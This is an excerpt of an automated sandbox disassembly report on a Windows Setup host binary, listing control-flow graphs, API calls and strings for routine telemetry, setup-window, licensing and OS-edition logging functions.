                                                                                                                        • String ID: AllowCommercialDataPipeline$AllowTelemetry$ConfigureTelemetryOptInChangeNotification$ConfigureTelemetryOptInSettingsUx$DisableDeviceDelete$DisableDiagnosticDataViewer$DisableTelemetryOptInChangeNotification$DisableTelemetryOptInSettingsUx$LimitEnhancedDiagnosticDataWindowsAnalytics$PolicyManager_FreeGetPolicyData$PolicyManager_GetPolicy$Software\Policies\Microsoft\Windows\DataCollection$System$policymanager.dll
                                                                                                                        • API String ID: 2256533930-3128045802
                                                                                                                        • Opcode ID: 449a41a5cd55d3bda4790e0978baf387e326d3a86b8e1bd4e4d49289e65978ef
                                                                                                                        • Instruction ID: 32ab8332bd23bca79a258435f156417933ac8414707c72a1ec73582ee611e8ce
                                                                                                                        • Opcode Fuzzy Hash: 449a41a5cd55d3bda4790e0978baf387e326d3a86b8e1bd4e4d49289e65978ef
                                                                                                                        • Instruction Fuzzy Hash: 2C51F571D84325EBDB558B14EC58BEE7FA8FF19325F10806AF805A7380DB349D009BA9
                                                                                                                        Function 004E75C4 Relevance: 44.2, APIs: 6, Strings: 19, Instructions: 427windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 763 4e75c4-4e75dd 764 4e7826-4e782d 763->764 765 4e75e3 763->765 766 4e7833-4e7836 764->766 767 4e7a81-4e7a97 764->767 768 4e778a-4e7792 765->768 769 4e75e9-4e75ec 765->769 770 4e79af-4e79c2 766->770 771 4e783c-4e783f 766->771 798 4e7ab9-4e7abb PostQuitMessage 767->798 799 4e7a99-4e7ab6 call 4f8a19 767->799 772 4e779d-4e77a8 768->772 773 4e7794-4e7797 768->773 774 4e75f2-4e75f5 769->774 775 4e7733-4e7746 769->775 809 4e79e4-4e79f2 ShutdownBlockReasonCreate 770->809 810 4e79c4-4e79e1 call 4f8a19 770->810 781 4e78f4-4e7907 771->781 782 4e7845-4e7848 771->782 776 4e77aa-4e77b9 772->776 777 4e77f2-4e77fe 772->777 773->772 783 4e784a-4e785a DefWindowProcW 773->783 778 4e75fb-4e7601 774->778 779 4e76f3-4e7706 774->779 802 4e777d-4e7785 775->802 803 4e7748-4e7751 775->803 812 4e77db-4e77de 776->812 813 4e77bb 776->813 777->783 825 4e7800-4e7824 call 4f8a19 777->825 785 4e76ae-4e76c1 778->785 786 4e7607-4e760d 778->786 814 4e772c-4e772e 779->814 815 4e7708-4e7729 call 4f8a19 779->815 817 4e7929-4e7934 ShutdownBlockReasonDestroy 781->817 818 4e7909-4e7926 call 4f8a19 781->818 782->783 787 4e785f-4e7872 782->787 788 4e7ac3-4e7ac7 783->788 836 4e76e4-4e76ec call 4f8877 785->836 837 4e76c3-4e76e1 call 4f8a19 785->837 786->783 791 4e7613-4e7626 786->791 829 4e7894-4e789f 787->829 830 4e7874-4e7891 call 4f8a19 787->830 844 4e7628-4e7646 call 4f8a19 791->844 845 4e7649-4e7654 791->845 811 4e7ac1 798->811 799->798 802->788 821 4e7758-4e777a call 4f8a19 803->821 822 4e7753 803->822 819 4e79f4-4e7a07 809->819 820 4e7a31-4e7a39 GetLastError 809->820 810->809 811->788 832 4e77e1-4e77ed 812->832 828 4e77c0-4e77d8 call 4f8a19 813->828 814->788 815->814 833 4e7936-4e7949 817->833 834 4e7974-4e797c GetLastError 817->834 818->817 883 4e7a29-4e7a2c 819->883 884 4e7a09-4e7a26 call 4f8a19 819->884 826 4e7a3b-4e7a3e 820->826 827 4e7a43-4e7a59 820->827 821->802 822->821 825->783 826->827 827->811 889 4e7a5b-4e7a5e 827->889 828->812 840 4e78bd-4e78c9 829->840 841 4e78a1-4e78ad 829->841 830->829 832->811 895 4e796b-4e796f 833->895 896 4e794b-4e7968 call 4f8a19 833->896 848 4e797e-4e7981 834->848 849 4e7986-4e799c 834->849 851 4e76f1 836->851 837->836 840->811 910 4e78cf-4e78d4 840->910 841->812 908 4e78b3-4e78b8 841->908 844->845 860 4e7656-4e7662 845->860 861 4e7690-4e769c 845->861 848->849 849->811 903 4e79a2-4e79aa 849->903 851->814 913 4e7664-4e7682 call 4f8a19 860->913 914 4e7685-4e768b 860->914 861->811 915 4e76a2-4e76a9 861->915 883->811 884->883 904 4e7a63-4e7a7f call 4f8a19 889->904 895->811 896->895 903->904 904->811 908->828 917 4e78d5-4e78ef call 4f8a19 910->917 913->914 914->832 915->917 917->811
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7854
                                                                                                                        • ShutdownBlockReasonDestroy.USER32(?,?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E792C
                                                                                                                        • ShutdownBlockReasonCreate.USER32(?,?), ref: 004E79EA
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7A31
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7974
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 004E7ABB
                                                                                                                        Strings
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004E76E7
                                                                                                                        • FALSE, xrefs: 004E7753, 004E775B
                                                                                                                        • SetupUI: Logging EndSession [0x%X] notification..., xrefs: 004E770D
                                                                                                                        • SetupUI: Got a message for session state change, xrefs: 004E762A
                                                                                                                        • SetupUI: Calling ShutdownBlockReasonDestroy..., xrefs: 004E790B
                                                                                                                        • SetupUI: Calling registered callback..., xrefs: 004E7666, 004E78B3
                                                                                                                        • SetupUI: Got a message from Store, xrefs: 004E7876
                                                                                                                        • TRUE, xrefs: 004E774C
                                                                                                                        • SetupUI: Button click detected - no registered callback., xrefs: 004E7802
                                                                                                                        • SetupUI: Posting Quit Message..., xrefs: 004E7A9B
                                                                                                                        • SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X, xrefs: 004E7A5E
                                                                                                                        • SetupUI: Button click detected - calling registered callback..., xrefs: 004E77BB
                                                                                                                        • SetupUI: ShutdownBlockReasonCreate succeeded!, xrefs: 004E7A0B
                                                                                                                        • SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X, xrefs: 004E79A5
                                                                                                                        • SetupUI: Returning %s to QueryEndSession [0x%X] request..., xrefs: 004E775E
                                                                                                                        • SetupUI: Calling ShutdownBlockReasonCreate..., xrefs: 004E79C6
                                                                                                                        • SetupUI: ShutdownBlockReasonDestroy succeeded!, xrefs: 004E794D
                                                                                                                        • SetupUI: No registered callback., xrefs: 004E76A2, 004E78CF
                                                                                                                        • SetupUI: Got a timer message, xrefs: 004E76C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockErrorLastReasonShutdown$CreateDestroyH_prolog3MessagePostProcQuitWindow
                                                                                                                        • String ID: FALSE$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Button click detected - calling registered callback...$SetupUI: Button click detected - no registered callback.$SetupUI: Calling ShutdownBlockReasonCreate...$SetupUI: Calling ShutdownBlockReasonDestroy...$SetupUI: Calling registered callback...$SetupUI: Got a message for session state change$SetupUI: Got a message from Store$SetupUI: Got a timer message$SetupUI: Logging EndSession [0x%X] notification...$SetupUI: No registered callback.$SetupUI: Posting Quit Message...$SetupUI: Returning %s to QueryEndSession [0x%X] request...$SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X$SetupUI: ShutdownBlockReasonCreate succeeded!$SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X$SetupUI: ShutdownBlockReasonDestroy succeeded!$TRUE
                                                                                                                        • API String ID: 2660305463-3359713709
                                                                                                                        • Opcode ID: 58344904730569409c8a8d99f3f8e518fd443dbbd92be42b863f53ae4a228c0e
                                                                                                                        • Instruction ID: e27fd99320f46b857d0d89b4693f28d7be2e14ee3e9772b05f415fb68afaeab6
                                                                                                                        • Opcode Fuzzy Hash: 58344904730569409c8a8d99f3f8e518fd443dbbd92be42b863f53ae4a228c0e
                                                                                                                        • Instruction Fuzzy Hash: 4AE1D6B4B046159BCF046B669C6CA3EBB55FF48322B08805BEC0597391DF38ED02DE99
                                                                                                                        Function 004EC756 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 324COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 966 4ec756-4ec7fb call 54f3e6 call 53da8f memset call 4fe9f7 call 4f8af9 975 4ec83f-4ec85e call 4ff51a call 4f8af9 966->975 976 4ec7fd-4ec817 GetLastError call 4f9d6c 966->976 984 4ec87b-4ec887 975->984 985 4ec860-4ec879 975->985 981 4ec81a-4ec82b 976->981 990 4ec831-4ec83a call 4f8ab5 981->990 994 4ec889-4ec8a8 call 4f8a19 984->994 995 4ec8b0-4ec8c3 call 53de32 984->995 985->990 998 4ecb1d-4ecb2a call 4f9d9c 990->998 1013 4ec8ad 994->1013 1003 4ec8d4-4ec8e8 call 53d721 995->1003 1004 4ec8c5-4ec8cf 995->1004 1005 4ecb2c-4ecb33 call 4f9b21 998->1005 1006 4ecb3a-4ecb5f call 4eee5d * 2 call 54f3a4 998->1006 1015 4ec92f-4ec93b 1003->1015 1016 4ec8ea-4ec8f6 1003->1016 1004->981 1005->1006 1013->995 1026 4ec95e-4ec971 1015->1026 1027 4ec93d-4ec95b call 4f8a19 1015->1027 1016->1026 1028 4ec8f8-4ec904 1016->1028 1038 4ec9ce-4ec9e1 1026->1038 1039 4ec973-4ec97c 1026->1039 1027->1026 1029 4ec90b-4ec925 call 4f8a19 1028->1029 1030 4ec906 1028->1030 1044 4ec92a-4ec92d 1029->1044 1030->1029 1054 4eca0e-4eca21 1038->1054 1055 4ec9e3-4eca06 GetSystemDefaultUILanguage call 4f8a19 1038->1055 1042 4ec97e-4ec983 1039->1042 1043 4ec985-4ec988 1039->1043 1046 4ec9ac-4ec9c6 call 4f8a19 1042->1046 1047 4ec98a-4ec98f 1043->1047 1048 4ec991-4ec994 1043->1048 1044->1026 1060 4ec9cb 1046->1060 1047->1046 1049 4ec99d-4ec9a5 1048->1049 1050 4ec996-4ec99b 1048->1050 1049->1046 1053 4ec9a7 1049->1053 1050->1046 1053->1046 1064 4eca4e-4eca61 1054->1064 1065 4eca23-4eca46 GetUserDefaultUILanguage call 4f8a19 1054->1065 1066 4eca0b 1055->1066 1060->1038 1071 4eca8b-4eca9e 1064->1071 1072 4eca63-4eca83 call 4f8a19 1064->1072 1074 4eca4b 1065->1074 1066->1054 1080 4ecad3-4ecaf2 call 4fb583 1071->1080 1081 4ecaa0-4ecacb call 4f8a19 1071->1081 1083 4eca88 1072->1083 1074->1064 1086 4ecaf4-4ecb0c call 4f8ab5 1080->1086 1087 4ecb60-4ecb6c 1080->1087 1092 4ecad0 1081->1092 1083->1071 1096 4ecb11 1086->1096 1095 4ecb6e-4ecb8e call 4f8a19 1087->1095 1087->1096 1092->1080 1102 4ecb93-4ecb96 1095->1102 1098 4ecb17 1096->1098 1098->998 1102->1098
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004EC760
                                                                                                                        • memset.MSVCRT ref: 004EC7CC
                                                                                                                          • Part of subcall function 004FE9F7: memset.MSVCRT ref: 004FEA20
                                                                                                                          • Part of subcall function 004FE9F7: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 004FEA37
                                                                                                                          • Part of subcall function 004FE9F7: GetLastError.KERNEL32(?,00000000), ref: 004FEA52
                                                                                                                          • Part of subcall function 004FE9F7: SetLastError.KERNEL32(00000000,?,00000000), ref: 004FEA62
                                                                                                                          • Part of subcall function 004F8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,004FB826,?,?,?,00000000), ref: 004F8B0A
                                                                                                                          • Part of subcall function 004F8AF9: HeapFree.KERNEL32(00000000,?,004FB826,?,?,?,00000000), ref: 004F8B11
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004EC7FD
                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 004EC9E3
                                                                                                                        • GetUserDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 004ECA23
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$DefaultHeapLanguagememset$FileFreeH_prolog3H_prolog3_ModuleNameProcessSystemUser
                                                                                                                        • String ID: Host OS Architecture [ %s ]$ Host OS Build String [ %s ]$ Host OS Edition [ %s ]$ Host OS Language Id [ %d ]$ Host OS License State [ %s ]$ Host OS License State [ UNAVAILABLE ]$ Host OS Version [ %d.%d.%d ]$ User UI Language Id [ %d ]$CSetupHost::LogBuildInfo$Genuine$Not-Genuine$SetupHost: Setup build version is: %s$Unknown$arm$arm64$x64$x86
                                                                                                                        • API String ID: 1568751597-578167857
                                                                                                                        • Opcode ID: df5142e232880ae952fdbeb622de6924d732e93a4f46b397d0708c048c4b0a00
                                                                                                                        • Instruction ID: b3d769b21cbee8fbacc67794ef1d56f6f61b17e7f6007f7073f92404e78ba132
                                                                                                                        • Opcode Fuzzy Hash: df5142e232880ae952fdbeb622de6924d732e93a4f46b397d0708c048c4b0a00
                                                                                                                        • Instruction Fuzzy Hash: 8FC1B974B006288BCF54AB259C99B2D77A1FF44311F04859FE8469B391CF389D05CF99
                                                                                                                        Function 0053D77D Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 221libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1103 53d77d-53d7b2 call 54f3b3 1106 53d7c5-53d7d9 LoadLibraryExW 1103->1106 1107 53d7b4 1103->1107 1109 53d7db-53d7ea GetLastError call 4f9d6c 1106->1109 1110 53d7ec-53d7fc GetProcAddress 1106->1110 1108 53d7b9-53d7c0 call 4f9d84 1107->1108 1121 53d9a8-53d9ac 1108->1121 1109->1108 1111 53d812-53d823 GetProcAddress 1110->1111 1112 53d7fe-53d80d GetLastError call 4f9d6c 1110->1112 1111->1112 1117 53d825-53d836 GetProcAddress 1111->1117 1122 53d99e-53d9a0 call 4f9d84 1112->1122 1117->1112 1120 53d838-53d849 GetProcAddress 1117->1120 1120->1112 1125 53d84b-53d85c GetProcAddress 1120->1125 1123 53d9bb-53d9c6 call 4f9d9c 1121->1123 1124 53d9ae-53d9b9 1121->1124 1129 53d9a5 1122->1129 1133 53d9d5-53d9d9 1123->1133 1134 53d9c8-53d9d1 LocalFree 1123->1134 1124->1123 1125->1112 1127 53d85e-53d870 1125->1127 1127->1122 1142 53d876-53d89b 1127->1142 1129->1121 1135 53d9db-53d9e4 LocalFree 1133->1135 1136 53d9e8-53d9ec 1133->1136 1134->1133 1135->1136 1137 53d9fb-53da01 1136->1137 1138 53d9ee-53d9f7 LocalFree 1136->1138 1140 53da03-53da04 FreeLibrary 1137->1140 1141 53da0a-53da15 call 54f390 1137->1141 1138->1137 1140->1141 1142->1122 1147 53d8a1-53d8a9 1142->1147 1148 53d999 1147->1148 1149 53d8af-53d8b1 1147->1149 1148->1122 1150 53d8b4-53d8bd 1149->1150 1151 53d8bf-53d8c8 LocalFree 1150->1151 1152 53d8cc-53d8f3 1150->1152 1151->1152 1155 53d8f5-53d8f9 1152->1155 1156 53d928-53d92c 1152->1156 1159 53d981 1155->1159 1160 53d8ff 1155->1160 1157 53d93b-53d956 1156->1157 1158 53d92e-53d937 LocalFree 1156->1158 1169 53d958-53d95d 1157->1169 1158->1157 1161 53d983 call 4f9d84 1159->1161 1162 53d902-53d915 1160->1162 1168 53d988-53d98b 1161->1168 1162->1150 1165 53d917-53d919 1162->1165 1166 53d996 1165->1166 1167 53d91b-53d926 1165->1167 1166->1148 1167->1168 1168->1129 1169->1160 1170 53d95f-53d963 1169->1170 1170->1159 1171 53d965-53d969 1170->1171 1171->1160 1172 53d96b-53d96f 1171->1172 1173 53d971-53d97f 1172->1173 1174 53d98d-53d994 1172->1174 1173->1162 1174->1161
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053D784
                                                                                                                        • LoadLibraryExW.KERNEL32(SLC.DLL,00000000,00000000,0000006C,0053D74D,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0053D7CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0053D7DB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLOpen), ref: 0053D7F2
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0053D7FE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLClose), ref: 0053D818
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetLicensingStatusInformation), ref: 0053D82B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetProductSkuInformation), ref: 0053D83E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetSLIDList), ref: 0053D851
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D8C2
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9CB
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9DE
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9F1
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0053DA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeProc$Local$ErrorLastLibrary$H_prolog3Load
                                                                                                                        • String ID: DependsOn$SLC.DLL$SLClose$SLGetLicensingStatusInformation$SLGetProductSkuInformation$SLGetSLIDList$SLOpen
                                                                                                                        • API String ID: 2218164828-1438759880
                                                                                                                        • Opcode ID: af2645b29fcee31d170fb747118660c09301219b8b631189c25079fb180498b0
                                                                                                                        • Instruction ID: d56315954d0bb1f6a0ce20747873d21c1f8cc077785b1356fa2c1821c01cf519
                                                                                                                        • Opcode Fuzzy Hash: af2645b29fcee31d170fb747118660c09301219b8b631189c25079fb180498b0
                                                                                                                        • Instruction Fuzzy Hash: F3814B31E0030A9BDF119FA5EC59BAEBBB5BF48316F20442AE501B7290CB749D45DF64
                                                                                                                        Function 004E7BE5 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211registrywindowtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1175 4e7be5-4e7c13 call 54f3b3 call 4f9c14 1180 4e7c15-4e7c1c 1175->1180 1181 4e7c41-4e7c5c LoadImageW 1175->1181 1182 4e7c1f-4e7c3c call 4f8ab5 1180->1182 1183 4e7c5e-4e7c78 GetLastError call 4f9d6c 1181->1183 1184 4e7c7a-4e7cc2 LoadCursorW RegisterClassW 1181->1184 1204 4e7d12-4e7d14 1182->1204 1183->1182 1186 4e7d37-4e7d4a 1184->1186 1187 4e7cc4-4e7ccf GetLastError 1184->1187 1199 4e7d4c-4e7d6a call 4f8a19 1186->1199 1200 4e7d6d-4e7d8d CreateWindowExW 1186->1200 1187->1186 1190 4e7cd1-4e7ce3 GetLastError call 4f9d53 1187->1190 1190->1186 1195 4e7ce5-4e7d0a call 4f8ab5 1190->1195 1225 4e7d0f 1195->1225 1199->1200 1201 4e7d8f-4e7d9c GetLastError call 4f9d6c 1200->1201 1202 4e7da6-4e7db8 ChangeWindowMessageFilterEx 1200->1202 1201->1202 1206 4e7dba-4e7dc7 GetLastError call 4f9d6c 1202->1206 1207 4e7dd1-4e7de6 SetTimer 1202->1207 1208 4e7d1d-4e7d26 call 4f9d9c 1204->1208 1209 4e7d16-4e7d18 call 4e7e94 1204->1209 1206->1207 1214 4e7dff-4e7e0e call 4f8822 1207->1214 1215 4e7de8-4e7df5 GetLastError call 4f9d6c 1207->1215 1228 4e7d2f-4e7d36 call 54f390 1208->1228 1229 4e7d28-4e7d2a call 4f9b21 1208->1229 1209->1208 1230 4e7e1a-4e7e2c UpdateWindow 1214->1230 1231 4e7e10 1214->1231 1215->1214 1225->1204 1229->1228 1236 4e7e2e-4e7e3b GetLastError call 4f9d6c 1230->1236 1237 4e7e45-4e7e67 ShowWindow SetWindowLongW GetWindowLongW 1230->1237 1231->1230 1236->1237 1237->1225 1239 4e7e6d-4e7e88 1237->1239
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E7BEC
                                                                                                                        • LoadImageW.USER32(00000040,?,00000001,00000000,00000000,00000040), ref: 004E7C4F
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7C5E
                                                                                                                        • LoadCursorW.USER32 ref: 004E7CA2
                                                                                                                        • RegisterClassW.USER32(00000003), ref: 004E7CB9
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7CC4
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7CD1
                                                                                                                        • CreateWindowExW.USER32(00000000,?,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 004E7D83
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7D8F
                                                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,00009234,00000001,00000000), ref: 004E7DB0
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7DBA
                                                                                                                        • SetTimer.USER32(00000000,00001230,00001388,00000000), ref: 004E7DDE
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7DE8
                                                                                                                        • UpdateWindow.USER32(00000000), ref: 004E7E24
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7E2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Window$Load$ChangeClassCreateCursorFilterH_prolog3ImageMessageRegisterTimerUpdate
                                                                                                                        • String ID: CSystemHelper::CreateMainWindow$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Creating main window...${6c104913-738b-4411-a4ec-8b594e314f6b}
                                                                                                                        • API String ID: 1906055104-1803576973
                                                                                                                        • Opcode ID: ddb90c23b2d86cd4cc19ff97dbda228671dfab4059ec6694613c276c454f5b15
                                                                                                                        • Instruction ID: 503240e1bbb0af85f5cd9640d24a55b16e56fb690590912e00aa2bae5c3799f7
                                                                                                                        • Opcode Fuzzy Hash: ddb90c23b2d86cd4cc19ff97dbda228671dfab4059ec6694613c276c454f5b15
                                                                                                                        • Instruction Fuzzy Hash: EB71F770B043049BDF04AFB59C59F7E77B6AF98322F20441AF902EB391DB7898019B59
                                                                                                                        Function 0054D5FC Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 191COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1243 54d5fc-54d639 call 54f3e6 1246 54d645-54d680 memset RtlGetVersion call 4f9ca1 1243->1246 1247 54d63b-54d640 1243->1247 1253 54d682-54d688 1246->1253 1254 54d68d-54d694 1246->1254 1248 54d88f-54d891 call 4f9d84 1247->1248 1252 54d896-54d8a9 call 4f9d9c 1248->1252 1264 54d8b2-54d8bb 1252->1264 1265 54d8ab-54d8ad call 4f9b21 1252->1265 1253->1248 1256 54d7e1-54d7e8 1254->1256 1257 54d69a-54d6ac call 4fb1d4 1254->1257 1260 54d7ee-54d7f5 1256->1260 1261 54d88a 1256->1261 1266 54d6b1-54d6b5 1257->1266 1262 54d844-54d84b 1260->1262 1263 54d7f7-54d7fb 1260->1263 1261->1248 1262->1261 1274 54d84d-54d85a 1262->1274 1267 54d6f1 1263->1267 1268 54d801-54d80b 1263->1268 1272 54d8c4-54d8cd 1264->1272 1273 54d8bd-54d8bf call 4f9b21 1264->1273 1265->1264 1270 54d6b7-54d6c4 call 4f9d84 1266->1270 1271 54d6c9-54d6eb CompareStringW 1266->1271 1282 54d6f7 1267->1282 1275 54d817-54d81b 1268->1275 1276 54d80d-54d812 1268->1276 1270->1252 1271->1267 1279 54d77c-54d795 CompareStringW 1271->1279 1280 54d8d6-54d8e5 1272->1280 1281 54d8cf-54d8d1 call 4f9b21 1272->1281 1273->1272 1274->1282 1283 54d860-54d865 1274->1283 1285 54d827-54d82e 1275->1285 1286 54d81d-54d822 1275->1286 1284 54d6fc-54d705 call 4f9c14 1276->1284 1288 54d7a7-54d7c0 CompareStringW 1279->1288 1289 54d797-54d7a2 1279->1289 1291 54d8e7 call 4f9b21 1280->1291 1292 54d8ec-54d8f7 call 54f3a4 1280->1292 1281->1280 1282->1284 1283->1284 1284->1248 1301 54d70b-54d711 call 54d460 1284->1301 1294 54d830-54d835 1285->1294 1295 54d83a-54d83f 1285->1295 1286->1284 1296 54d7d2-54d7dc 1288->1296 1297 54d7c2-54d7cd 1288->1297 1289->1284 1291->1292 1294->1284 1295->1284 1296->1301 1297->1284 1304 54d716-54d71a 1301->1304 1304->1248 1305 54d720-54d740 CompareStringW 1304->1305 1306 54d746-54d764 call 4e1bc9 1305->1306 1307 54d872-54d878 1305->1307 1311 54d86a-54d870 1306->1311 1312 54d76a-54d777 call 4f9d84 1306->1312 1309 54d87e-54d888 1307->1309 1309->1252 1311->1309 1312->1252
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_Versionmemset
                                                                                                                        • String ID: %sCore$Business$BusinessN$EditionId$HomePremium$Professional$ProfessionalN$Server Core$ServerComputeCluster$ServerDatacenter$ServerEnterprise$ServerHPC$ServerStandard$ServerWeb$Software\Microsoft\Windows NT\CurrentVersion
